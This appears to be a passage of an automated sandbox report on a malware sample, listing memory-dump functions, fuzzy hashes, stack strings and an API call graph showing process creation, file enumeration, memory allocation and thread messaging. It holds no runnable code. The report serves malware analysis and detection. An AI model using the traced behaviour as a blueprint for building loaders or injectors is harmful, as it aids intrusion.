                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 059ba52aad61e5139d8623b345dbbe53e1a12d0b40450d37b5105a3d0ea54d70
                                                                        • Instruction ID: e7d6494e36d91f8154fcd832cca3588112e097254f44ad5bf99b04e052710381
                                                                        • Opcode Fuzzy Hash: 059ba52aad61e5139d8623b345dbbe53e1a12d0b40450d37b5105a3d0ea54d70
                                                                        • Instruction Fuzzy Hash: 4B11F9B6D0121CAF8B40DFA9DD409EFBBF9EF48204F14456AE909E7200E7715A048FA0
                                                                        Function 02FD3470 Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16882bb59a27b91d610d4615df323210088e01048f4a6282e7d400d52420b59d
                                                                        • Instruction ID: 5c274d54ae561054511db75124ad211b89c13c1866998e5ccdaf8599f0f7e909
                                                                        • Opcode Fuzzy Hash: 16882bb59a27b91d610d4615df323210088e01048f4a6282e7d400d52420b59d
                                                                        • Instruction Fuzzy Hash: 3201D2B2215108BBCB54DF99DC81EEB77AEAF8C754F408108BA19E3240D630F8518BA4
                                                                        Function 02FCF050 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ff9e063acde6f9e72fdddd3ad8af59ed836a07fd28031e00596d0092fc8d44fc
                                                                        • Instruction ID: 92defd48feefff44e163a86c29f69d79dcfb48aadbd1913022a1ad2c95bfb407
                                                                        • Opcode Fuzzy Hash: ff9e063acde6f9e72fdddd3ad8af59ed836a07fd28031e00596d0092fc8d44fc
                                                                        • Instruction Fuzzy Hash: AA01C9B6D1121DAE8B40DFE8D941AEEBBF9BF18744F14466AD915E2200F77056048BA1
                                                                        Function 02FAD93A Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c5f4bffee225d14b924bc1f714eb79d08ba0ef5741ebe9563af9905981ef3755
                                                                        • Instruction ID: 692403c8c56f6df4059317449ac8e0fbdcad13c5a882972771a8cc872f02b3ef
                                                                        • Opcode Fuzzy Hash: c5f4bffee225d14b924bc1f714eb79d08ba0ef5741ebe9563af9905981ef3755
                                                                        • Instruction Fuzzy Hash: 13F0B4B360021667D7105A5DAC50BC6B79CEB893B8F240122FE5C97642E671E85187E0
                                                                        Function 02FD2730 Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1635dbfa9e928d7a95508c0ef9cd9f1e711e410d6ca20e32e7ea2f8e357c6a8f
                                                                        • Instruction ID: 3b4873a1b939949065f2b23aab26470dd22c5f8d82250120fb4bbaedbf3047f5
                                                                        • Opcode Fuzzy Hash: 1635dbfa9e928d7a95508c0ef9cd9f1e711e410d6ca20e32e7ea2f8e357c6a8f
                                                                        • Instruction Fuzzy Hash: 26F01CB52002097BCB10DE99DC85E9B77ADEFC9750F008509BA1897241D770B9118BB4
                                                                        Function 02FD3390 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cbed1c5dadce8dee4f5864739191d440a36e63c66ed89e5065b9b69a9647fa94
                                                                        • Instruction ID: f4e281ada9d8764f2e00189b520acf3ecdcd5595161eeffcc32aaf03fd284994
                                                                        • Opcode Fuzzy Hash: cbed1c5dadce8dee4f5864739191d440a36e63c66ed89e5065b9b69a9647fa94
                                                                        • Instruction Fuzzy Hash: A8E092B12042097BC724EE98DC41FAB37ADEFC5750F004419FE18A7241D630B8108BB4
                                                                        Function 02FC1CF0 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca1a6a713b3f01840001392278596669daafcc955991422778cdfdd8a1516e09
                                                                        • Instruction ID: feadc81bef516f8861711ab8920c5914cce39c96c11ba7cd4caa64ee7f6e556b
                                                                        • Opcode Fuzzy Hash: ca1a6a713b3f01840001392278596669daafcc955991422778cdfdd8a1516e09
                                                                        • Instruction Fuzzy Hash: F0F0A771C1520DEBDB14DF64D941BDEBBB5EB04360F2043AEE929DB2C0D6349B548B81
                                                                        Function 02FD5210 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f12d61495a04204f8f924154e64a02f0c27736aa0198065d318a60d8de482c7
                                                                        • Instruction ID: 7766147a300eff3f0a36b10e54509c85ede2aaccab3ea611980b90acdbfedd07
                                                                        • Opcode Fuzzy Hash: 8f12d61495a04204f8f924154e64a02f0c27736aa0198065d318a60d8de482c7
                                                                        • Instruction Fuzzy Hash: 6CE08C36A0022437D22166899C09FEBB7AFCBD1FA1F9D0065FF189B340E670B90086E5
                                                                        Function 02FD3090 Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 193f3562c9ccceffbf2ab8c981e63ac041f9aa8d1b0f16e9b97175512fe5262a
                                                                        • Instruction ID: 39ff7432289158d8fffd8168f9d51628ab2a1ff229b5d06c9602bc8fd325804a
                                                                        • Opcode Fuzzy Hash: 193f3562c9ccceffbf2ab8c981e63ac041f9aa8d1b0f16e9b97175512fe5262a
                                                                        • Instruction Fuzzy Hash: FEE046362102147BC220FA99DC45FEB77ADEBC5768F048419FA08A7241D670B9008BF0

                                                                        Non-executed Functions

                                                                        Function 02FC4BB0 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                        • API String ID: 0-392141074
                                                                        • Opcode ID: a17ee18d0c560369dd798b8d3aaac3e96d40df6634ca6ed9744b35e27e0b82e8
                                                                        • Instruction ID: 9b098a43484ee72b7ec45d562f6c90e4e0ac3833582560f25b36a29aaa5bd998
                                                                        • Opcode Fuzzy Hash: a17ee18d0c560369dd798b8d3aaac3e96d40df6634ca6ed9744b35e27e0b82e8
                                                                        • Instruction Fuzzy Hash: 0B713DB1C1022CAADB25DB94CC41FEFB77EBF08745F44819DE619A6140E7716B488FA1
                                                                        Function 02FB87E7 Relevance: 13.9, Strings: 11, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                        • API String ID: 0-685823316
                                                                        • Opcode ID: e46b1417c8aff418060dc14a5cf817b70483b81e8f51daf884a10ff84797362f
                                                                        • Instruction ID: 403dc94eeb7b4bc1a94734816977dce40693aac8a353602a4a8ad141b073f00b
                                                                        • Opcode Fuzzy Hash: e46b1417c8aff418060dc14a5cf817b70483b81e8f51daf884a10ff84797362f
                                                                        • Instruction Fuzzy Hash: DB4171B1D01218ABEB10DF94DC85FEEBBBAAF44744F148159EA08B6180DBB566448FA4
                                                                        Function 02FBFCCB Relevance: 10.1, Strings: 8, Instructions: 132COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P$e$i$kA;kA;$m$o$r${A;
                                                                        • API String ID: 0-3297962327
                                                                        • Opcode ID: ab404d1530e5306c7b222616267334b9959adb47a51172e82b8b70d49443ae55
                                                                        • Instruction ID: 2bdc4df02faee790ef8f5a9649ba8f49590e1392c880381355312ea61faa0034
                                                                        • Opcode Fuzzy Hash: ab404d1530e5306c7b222616267334b9959adb47a51172e82b8b70d49443ae55
                                                                        • Instruction Fuzzy Hash: 5941C6B5C10218BBEB21EBA0DC41FDF737EAF14341F848599AA0DA7141EBB557488FA1
                                                                        Function 02FB1090 Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /$7$:$C$^$p
                                                                        • API String ID: 0-1759222796
                                                                        • Opcode ID: 3cf92cea0823ca310b328cd447c7ed0bf8c05d113e572f63ad57be0d306f5a53
                                                                        • Instruction ID: f1fdfd7677202f83bf2dd6ad2cba707fc380372de8636b965d3e5550e78a8965
                                                                        • Opcode Fuzzy Hash: 3cf92cea0823ca310b328cd447c7ed0bf8c05d113e572f63ad57be0d306f5a53
                                                                        • Instruction Fuzzy Hash: 9B11C820D0C7CED9DB12C6BC84186AEBF715F22268F4882D9D5A52B2D2C2794706C7A6
                                                                        Function 02FBFEB0 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 3$5$7$9
                                                                        • API String ID: 0-1367519925
                                                                        • Opcode ID: b985ffef933f7ba478da03b8d55aeb63dc70cb6400a847d38127e6f7cd5237f3
                                                                        • Instruction ID: 7b8dacc24ea59f34408fa6eb8d52cecb5832860dc99b1a9bc7bdea86da22e848
                                                                        • Opcode Fuzzy Hash: b985ffef933f7ba478da03b8d55aeb63dc70cb6400a847d38127e6f7cd5237f3
                                                                        • Instruction Fuzzy Hash: 593141B5E10109ABEB05DFA4DC45BEF73B9EF04348F444199FA04A7241EB71AA048BE5

                                                                        Execution Graph

                                                                        Execution Coverage:3.3%
                                                                        Dynamic/Decrypted Code Coverage:4.2%
                                                                        Signature Coverage:0.7%
                                                                        Total number of Nodes:452
                                                                        Total number of Limit Nodes:73
                                                                        execution_graph 81099 7631b5 81100 763167 81099->81100 81102 7631bb 81099->81102 81106 767e00 81100->81106 81104 76318f 81105 779520 NtClose 81105->81104 81107 767e1a 81106->81107 81111 763173 81106->81111 81112 778c60 81107->81112 81110 779520 NtClose 81110->81111 81111->81104 81111->81105 81113 778c7d 81112->81113 81116 34735c0 LdrInitializeThunk 81113->81116 81114 767eea 81114->81110 81116->81114 81117 759eb0 81120 75a1c0 81117->81120 81118 75a5e3 81120->81118 81121 77b220 81120->81121 81122 77b246 81121->81122 81127 754070 81122->81127 81124 77b252 81126 77b28b 81124->81126 81130 7756d0 81124->81130 81126->81118 81134 763270 81127->81134 81129 75407d 81129->81124 81131 775732 81130->81131 81133 77573f 81131->81133 81152 761a30 81131->81152 81133->81126 81135 76328d 81134->81135 81137 7632a3 81135->81137 81138 779f50 81135->81138 81137->81129 81139 779f6a 81138->81139 81140 779f99 81139->81140 81145 778bc0 81139->81145 81140->81137 81143 77b5c0 RtlFreeHeap 81144 77a00f 81143->81144 81144->81137 81146 778bdd 81145->81146 81149 3472c0a 81146->81149 81147 778c06 81147->81143 81150 3472c11 81149->81150 81151 3472c1f LdrInitializeThunk 81149->81151 81150->81147 81151->81147 81153 761a6b 81152->81153 81168 767f10 81153->81168 81155 761a73 81156 761d56 81155->81156 81157 77b6a0 RtlAllocateHeap 81155->81157 81156->81133 81158 761a89 81157->81158 81159 77b6a0 RtlAllocateHeap 81158->81159 81160 761a9a 81159->81160 81161 77b6a0 RtlAllocateHeap 81160->81161 81162 761aab 81161->81162 81167 761b48 81162->81167 81183 766aa0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81162->81183 81164 7645c0 LdrLoadDll 81165 761d02 81164->81165 81179 778010 81165->81179 81167->81164 81169 767f3c 81168->81169 81170 767e00 2 API calls 81169->81170 81171 767f5f 81170->81171 81172 767f81 81171->81172 81173 767f69 81171->81173 81174 767f9d 81172->81174 81177 779520 NtClose 81172->81177 81175 767f74 81173->81175 81176 779520 NtClose 81173->81176 81174->81155 81175->81155 81176->81175 81178 767f93 81177->81178 81178->81155 81180 778072 81179->81180 81182 77807f 81180->81182 81184 761d70 81180->81184 81182->81156 81183->81167 81200 7681e0 81184->81200 81186 7622f0 81186->81182 81187 761d90 81187->81186 81204 771200 81187->81204 81190 761fa4 81212 77c790 81190->81212 81191 761dee 81191->81186 81207 77c660 81191->81207 81194 761fb9 81196 762009 81194->81196 81218 760890 81194->81218 81196->81186 81197 760890 LdrInitializeThunk 81196->81197 81222 768180 81196->81222 81197->81196 81198 762160 81198->81196 81199 768180 LdrInitializeThunk 81198->81199 81199->81198 81201 7681ed 81200->81201 81202 768215 81201->81202 81203 76820e SetErrorMode 81201->81203 81202->81187 81203->81202 81205 77b530 NtAllocateVirtualMemory 81204->81205 81206 771221 81205->81206 81206->81191 81208 77c676 81207->81208 81209 77c670 81207->81209 81210 77b6a0 RtlAllocateHeap 81208->81210 81209->81190 81211 77c69c 81210->81211 81211->81190 81213 77c700 81212->81213 81214 77c75d 81213->81214 81215 77b6a0 RtlAllocateHeap 81213->81215 81214->81194 81216 77c73a 81215->81216 81217 77b5c0 RtlFreeHeap 81216->81217 81217->81214 81219 76089c 81218->81219 81226 779790 81219->81226 81223 768193 81222->81223 81231 778ac0 81223->81231 81225 7681be 81225->81196 81227 7797ad 81226->81227 81230 3472c70 LdrInitializeThunk 81227->81230 81228 7608b2 81228->81198 81230->81228 81232 778b3b 81231->81232 81234 778ae8 81231->81234 81236 3472dd0 LdrInitializeThunk 81232->81236 81233 778b5d 81233->81225 81234->81225 81236->81233 81237 765c30 81238 768180 LdrInitializeThunk 81237->81238 81239 765c60 81238->81239 81241 765c8c 81239->81241 81242 768100 81239->81242 81243 768144 81242->81243 81248 768165 81243->81248 81249 778890 81243->81249 81245 768155 81246 768171 81245->81246 81247 779520 NtClose 81245->81247 81246->81239 81247->81248 81248->81239 81250 77890a 81249->81250 81252 7788b8 81249->81252 81254 3474650 LdrInitializeThunk 81250->81254 81251 77892c 81251->81245 81252->81245 81254->81251 81255 7671b0 81256 7671cc 81255->81256 81264 76721f 81255->81264 81258 779520 NtClose 81256->81258 81256->81264 81257 767351 81259 7671e7 81258->81259 81265 7665d0 NtClose LdrInitializeThunk LdrInitializeThunk 81259->81265 81261 767331 81261->81257 81267 7667a0 NtClose LdrInitializeThunk LdrInitializeThunk 81261->81267 81264->81257 81266 7665d0 NtClose LdrInitializeThunk LdrInitializeThunk 81264->81266 81265->81264 81266->81261 81267->81257 80847 778b70 80848 778b8a 80847->80848 80851 3472df0 LdrInitializeThunk 80848->80851 80849 778baf 80851->80849 80852 7789f0 80853 778a7f 80852->80853 80855 778a1b 80852->80855 80857 3472ee0 LdrInitializeThunk 80853->80857 80854 778aad 80857->80854 81268 779230 81269 7792e4 81268->81269 81271 77925c 81268->81271 81270 7792f7 NtCreateFile 81269->81270 81277 7688a4 81279 7688b4 81277->81279 81278 768820 81279->81278 81281 767130 81279->81281 81282 767146 81281->81282 81284 76717f 81281->81284 81282->81284 81285 766fa0 LdrLoadDll 81282->81285 81284->81278 81285->81284 80858 76c660 80859 76c689 80858->80859 80860 76c78d 80859->80860 80861 76c733 FindFirstFileW 80859->80861 80861->80860 80863 76c74e 80861->80863 80862 76c774 FindNextFileW 80862->80863 80864 76c786 FindClose 80862->80864 80863->80862 80864->80860 80865 76f8e0 80866 76f944 80865->80866 80894 766340 80866->80894 80868 76fa7e 80869 76fa77 80869->80868 80901 766450 80869->80901 80871 76fafa 80872 76fc32 80871->80872 80891 76fc23 80871->80891 80905 76f6c0 80871->80905 80873 779520 NtClose 80872->80873 80875 76fc3c 80873->80875 80876 76fb36 80876->80872 80877 76fb41 80876->80877 80914 77b6a0 80877->80914 80879 76fb6a 80880 76fb73 80879->80880 80881 76fb89 80879->80881 80883 779520 NtClose 80880->80883 80917 76f5b0 CoInitialize 80881->80917 80884 76fb7d 80883->80884 80885 76fb97 80920 779010 80885->80920 80887 76fc12 80924 779520 80887->80924 80889 76fc1c 80927 77b5c0 80889->80927 80892 76fbb5 80892->80887 80893 779010 LdrInitializeThunk 80892->80893 80893->80892 80895 766373 80894->80895 80896 766397 80895->80896 80930 7790b0 80895->80930 80896->80869 80898 7663ba 80898->80896 80899 779520 NtClose 80898->80899 80900 76643a 80899->80900 80900->80869 80902 766475 80901->80902 80935 778ed0 80902->80935 80906 76f6dc 80905->80906 80940 7645c0 80906->80940 80908 76f703 80908->80876 80909 76f6fa 80909->80908 80910 7645c0 LdrLoadDll 80909->80910 80911 76f7ce 80910->80911 80912 7645c0 LdrLoadDll 80911->80912 80913 76f82b 80911->80913 80912->80913 80913->80876 80944 779820 80914->80944 80916 77b6bb 80916->80879 80919 76f615 80917->80919 80918 76f6ab CoUninitialize 80918->80885 80919->80918 80921 77902d 80920->80921 80947 3472ba0 LdrInitializeThunk 80921->80947 80922 77905a 80922->80892 80925 77953a 80924->80925 80926 779548 NtClose 80925->80926 80926->80889 80948 779870 80927->80948 80929 77b5d9 80929->80891 80931 7790cd 80930->80931 80934 3472ca0 LdrInitializeThunk 80931->80934 80932 7790f6 80932->80898 80934->80932 80936 778eea 80935->80936 80939 3472c60 LdrInitializeThunk 80936->80939 80937 7664e9 80937->80871 80939->80937 80941 7645e4 80940->80941 80942 7645eb 80941->80942 80943 764620 LdrLoadDll 80941->80943 80942->80909 80943->80942 80945 77983d 80944->80945 80946 77984b RtlAllocateHeap 80945->80946 80946->80916 80947->80922 80949 77988d 80948->80949 80950 77989b RtlFreeHeap 80949->80950 80950->80929 80951 3472ad0 LdrInitializeThunk 80952 7701e0 80953 7701fd 80952->80953 80954 7645c0 LdrLoadDll 80953->80954 80955 77021b 80954->80955 80956 759e50 80958 759e5f 80956->80958 80957 759ea0 80958->80957 80959 759e8d CreateThread 80958->80959 80960 76add0 80965 76aae0 80960->80965 80962 76addd 80979 76a760 80962->80979 80964 76adf3 80966 76ab05 80965->80966 80990 7683f0 80966->80990 80969 76ac53 80969->80962 80971 76ac6a 80971->80962 80972 76ac61 80972->80971 80974 76ad57 80972->80974 81009 76a1b0 80972->81009 80976 76adba 80974->80976 81018 76a520 80974->81018 80977 77b5c0 RtlFreeHeap 80976->80977 80978 76adc1 80977->80978 80978->80962 80980 76a776 80979->80980 80983 76a781 80979->80983 80981 77b6a0 RtlAllocateHeap 80980->80981 80981->80983 80982 76a7a2 80982->80964 80983->80982 80984 7683f0 GetFileAttributesW 80983->80984 80985 76aab2 80983->80985 80988 76a1b0 RtlFreeHeap 80983->80988 80989 76a520 RtlFreeHeap 80983->80989 80984->80983 80986 77b5c0 RtlFreeHeap 80985->80986 80987 76aacb 80985->80987 80986->80987 80987->80964 80988->80983 80989->80983 80991 768411 80990->80991 80992 768418 GetFileAttributesW 80991->80992 80993 768423 80991->80993 80992->80993 80993->80969 80994 773420 80993->80994 80995 77342e 80994->80995 80996 773435 80994->80996 80995->80972 80997 7645c0 LdrLoadDll 80996->80997 80998 77346a 80997->80998 80999 773479 80998->80999 81022 772ee0 LdrLoadDll 80998->81022 81001 77b6a0 RtlAllocateHeap 80999->81001 81006 773627 80999->81006 81002 773492 81001->81002 81003 7734ae 81002->81003 81004 77361d 81002->81004 81002->81006 81003->81006 81007 77b5c0 RtlFreeHeap 81003->81007 81005 77b5c0 RtlFreeHeap 81004->81005 81004->81006 81005->81006 81006->80972 81008 773611 81007->81008 81008->80972 81010 76a1d6 81009->81010 81023 76dbe0 81010->81023 81012 76a248 81014 76a3d0 81012->81014 81016 76a266 81012->81016 81013 76a3b5 81013->80972 81014->81013 81015 76a070 RtlFreeHeap 81014->81015 81015->81014 81016->81013 81028 76a070 81016->81028 81019 76a546 81018->81019 81020 76dbe0 RtlFreeHeap 81019->81020 81021 76a5cd 81020->81021 81021->80974 81022->80999 81025 76dbf2 81023->81025 81024 76dc11 81024->81012 81025->81024 81026 77b5c0 RtlFreeHeap 81025->81026 81027 76dc54 81026->81027 81027->81012 81029 76a08d 81028->81029 81032 76dc70 81029->81032 81031 76a193 81031->81016 81034 76dc94 81032->81034 81033 76dd3e 81033->81031 81034->81033 81035 77b5c0 RtlFreeHeap 81034->81035 81035->81033 81286 767390 81287 7673a8 81286->81287 81289 767402 81286->81289 81287->81289 81290 76b2f0 81287->81290 81291 76b316 81290->81291 81292 76b549 81291->81292 81317 779900 81291->81317 81292->81289 81294 76b38c 81294->81292 81295 77c790 2 API calls 81294->81295 81296 76b3ab 81295->81296 81296->81292 81297 76b482 81296->81297 81299 778bc0 LdrInitializeThunk 81296->81299 81298 76b4a1 81297->81298 81300 765bb0 LdrInitializeThunk 81297->81300 81304 76b531 81298->81304 81323 778730 81298->81323 81301 76b40d 81299->81301 81300->81298 81301->81297 81302 76b416 81301->81302 81302->81292 81303 76b46a 81302->81303 81306 76b448 81302->81306 81320 765bb0 81302->81320 81305 768180 LdrInitializeThunk 81303->81305 81310 768180 LdrInitializeThunk 81304->81310 81309 76b478 81305->81309 81338 774850 LdrInitializeThunk 81306->81338 81309->81289 81313 76b53f 81310->81313 81312 76b508 81328 7787e0 81312->81328 81313->81289 81315 76b522 81333 778940 81315->81333 81318 77991a 81317->81318 81319 77992b CreateProcessInternalW 81318->81319 81319->81294 81321 765bee 81320->81321 81339 778d90 81320->81339 81321->81306 81324 7787ad 81323->81324 81326 77875b 81323->81326 81345 34739b0 LdrInitializeThunk 81324->81345 81325 7787cf 81325->81312 81326->81312 81329 77885a 81328->81329 81330 778808 81328->81330 81346 3474340 LdrInitializeThunk 81329->81346 81330->81315 81331 77887c 81331->81315 81334 7789ba 81333->81334 81335 778968 81333->81335 81347 3472fb0 LdrInitializeThunk 81334->81347 81335->81304 81336 7789dc 81336->81304 81338->81303 81340 778e41 81339->81340 81342 778dbf 81339->81342 81344 3472d10 LdrInitializeThunk 81340->81344 81341 778e83 81341->81321 81342->81321 81344->81341 81345->81325 81346->81331 81347->81336 81038 771bd0 81043 771be9 81038->81043 81039 771c79 81040 771c31 81041 77b5c0 RtlFreeHeap 81040->81041 81042 771c41 81041->81042 81043->81039 81043->81040 81044 771c74 81043->81044 81045 77b5c0 RtlFreeHeap 81044->81045 81045->81039 81353 779390 81354 779437 81353->81354 81356 7793bb 81353->81356 81355 77944a NtReadFile 81354->81355 81357 769c9f 81358 769ca4 81357->81358 81359 77b5c0 RtlFreeHeap 81358->81359 81360 769cb6 81358->81360 81359->81360 81046 7627d8 81047 7627ec 81046->81047 81048 766340 2 API calls 81047->81048 81049 762803 81048->81049 81050 75b540 81053 77b530 81050->81053 81052 75cbb1 81056 779670 81053->81056 81055 77b561 81055->81052 81057 779705 81056->81057 81059 77969b 81056->81059 81058 779718 NtAllocateVirtualMemory 81057->81058 81058->81055 81059->81055 81361 760e00 81362 760e1a 81361->81362 81363 7645c0 LdrLoadDll 81362->81363 81364 760e38 81363->81364 81365 760e6c PostThreadMessageW 81364->81365 81366 760e7d 81364->81366 81365->81366 81367 762300 81368 778bc0 LdrInitializeThunk 81367->81368 81369 762336 81368->81369 81370 76234b 81369->81370 81372 7795b0 81369->81372 81373 77963c 81372->81373 81374 7795d8 81372->81374 81377 3472e80 LdrInitializeThunk 81373->81377 81374->81370 81375 77966a 81375->81370 81377->81375 81060 771840 81061 77185c 81060->81061 81062 771884 81061->81062 81063 771898 81061->81063 81064 779520 NtClose 81062->81064 81065 779520 NtClose 81063->81065 81067 77188d 81064->81067 81066 7718a1 81065->81066 81070 77b6e0 RtlAllocateHeap 81066->81070 81069 7718ac 81070->81069 81072 77c6c0 81073 77b5c0 RtlFreeHeap 81072->81073 81074 77c6d5 81073->81074 81075 776140 81076 77619a 81075->81076 81078 7761a7 81076->81078 81079 773b50 81076->81079 81080 77b530 NtAllocateVirtualMemory 81079->81080 81081 773b91 81080->81081 81082 7645c0 LdrLoadDll 81081->81082 81084 773c9e 81081->81084 81085 773bd7 81082->81085 81083 773c20 Sleep 81083->81085 81084->81078 81085->81083 81085->81084 81378 779480 81379 7794f4 81378->81379 81381 7794a8 81378->81381 81380 779507 NtDeleteFile 81379->81380 81382 766e8d 81383 766e4d 81382->81383 81386 766e90 81382->81386 81387 767fb0 81383->81387 81385 766e64 81388 767fcd 81387->81388 81394 778cb0 81388->81394 81390 76801d 81391 768024 81390->81391 81392 778d90 LdrInitializeThunk 81390->81392 81391->81385 81393 76804d 81392->81393 81393->81385 81395 778d4b 81394->81395 81396 778cdb 81394->81396 81399 3472f30 LdrInitializeThunk 81395->81399 81396->81390 81397 778d81 81397->81390 81399->81397 81086 765b4b 81087 765b6f 81086->81087 81088 765b6a 81086->81088 81089 779520 NtClose 81088->81089 81089->81087 81090 76fc48 81091 76fbc0 81090->81091 81095 76fc4c 81090->81095 81092 76fc12 81091->81092 81098 779010 LdrInitializeThunk 81091->81098 81093 779520 NtClose 81092->81093 81094 76fc1c 81093->81094 81096 77b5c0 RtlFreeHeap 81094->81096 81097 76fc23 81096->81097 81098->81091

                                                                        Executed Functions

                                                                        Function 00759EB0 Relevance: 32.9, Strings: 26, Instructions: 415COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
